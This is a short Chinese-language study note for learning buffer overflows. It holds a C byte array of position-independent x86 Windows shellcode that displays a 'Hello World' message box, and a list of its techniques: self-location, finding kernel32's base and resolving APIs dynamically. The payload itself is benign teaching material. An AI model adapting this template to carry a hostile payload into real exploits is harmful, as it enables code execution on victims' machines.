学习溢出时会用到
unsigned char ShellCode[] =
{
0xE8,0x00,0x00,0x00,0x00,0x5F,0x81,0xEF,
0x1E,0x10,0x40,0x00,0x8D,0x87,0x83,0x10,
0x40,0x00,0x50,0xE8,0x61,0x00,0x00,0x00,
0x33,0xC0,0x6A,0x00,0x8D,0x87,0x72,0x10,
0x40,0x00,0x50,0x8D,0x87,0x4D,0x10,0x40,
0x00,0x50,0x6A,0x00,0xFF,0x97,0x8A,0x10,
0x40,0x00,0x58,0xC3,0x5B,0x2A,0x5D,0x20,
0x48,0x65,0x6C,0x6C,0x6F,0x20,0x57,0x6F,
0x72,0x6C,0x64,0x20,0x43,0x6F,0x64,0x65,
0x72,0x21,0x20,0x28,0x43,0x29,0x20,0x41,
0x6E,0x73,0x6B,0x79,0x61,0x2E,0x0D,0x0A,
0x00,0x4D,0x73,0x67,0x42,0x6F,0x78,0x20,
0x42,0x79,0x20,0x41,0x6E,0x73,0x6B,0x79,
0x61,0x00,0x75,0x73,0x65,0x72,0x33,0x32,
0x00,0xF7,0x6C,0x55,0xD8,0x00,0x00,0x00,
0x00,0x60,0x8B,0x74,0x24,0x24,0xE8,0x97,
0x00,0x00,0x00,0x68,0xAD,0xD1,0x34,0x41,
0x50,0xE8,0x1F,0x00,0x00,0x00,0x56,0xFF,
0xD0,0x8B,0xD8,0x2B,0xC0,0xAC,0x84,0xC0,
0x75,0xFB,0x8B,0xFE,0xAD,0x85,0xC0,0x74,
0x0A,0x50,0x53,0xE8,0x05,0x00,0x00,0x00,
0xAB,0xEB,0xF1,0x61,0xC3,0x60,0x8B,0x5C,
0x24,0x24,0x8B,0x74,0x24,0x28,0x2B,0xED,
0x8B,0xD3,0x03,0x52,0x3C,0x8B,0x52,0x78,
0x03,0xD3,0x8B,0x42,0x18,0x8B,0x7A,0x1C,
0x03,0xFB,0x8B,0x7A,0x20,0x03,0xFB,0x52,
0x8B,0xD7,0x8B,0x17,0x03,0xD3,0x45,0x60,
0x8B,0xF2,0x2B,0xC9,0xAC,0x41,0x84,0xC0,
0x75,0xFA,0x89,0x4C,0x24,0x18,0x61,0x60,
0x2B,0xC0,0xE8,0x51,0x00,0x00,0x00,0x3B,
0xC6,0x61,0x74,0x08,0x83,0xC7,0x04,0x48,
0x74,0x18,0xEB,0xD6,0x5A,0x4D,0x8B,0x4A,
0x24,0x03,0xCB,0x0F,0xB7,0x04,0x69,0x8B,
0x6A,0x1C,0x03,0xEB,0x8B,0x44,0x85,0x00,
0x03,0xC3,0x89,0x44,0x24,0x1C,0x61,0xC2,
0x08,0x00,0x60,0x2B,0xC0,0x64,0x8B,0x40,
0x30,0x85,0xC0,0x78,0x0C,0x8B,0x40,0x0C,
0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,
0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,
0x40,0x3C,0x89,0x44,0x24,0x1C,0x61,0xC3,
0x60,0xE3,0x18,0xF7,0xD0,0x32,0x02,0x42,
0xB3,0x08,0xD1,0xE8,0x73,0x05,0x35,0x20,
0x83,0xB8,0xED,0xFE,0xCB,0x75,0xF3,0xE2,
0xEC,0xF7,0xD0,0x89,0x44,0x24,0x1C,0x61,
0xC3
};
一个MessageBox...
1.代码自定位
2.获取K32基址
3.动态搜索需要使用的API
4.平衡堆践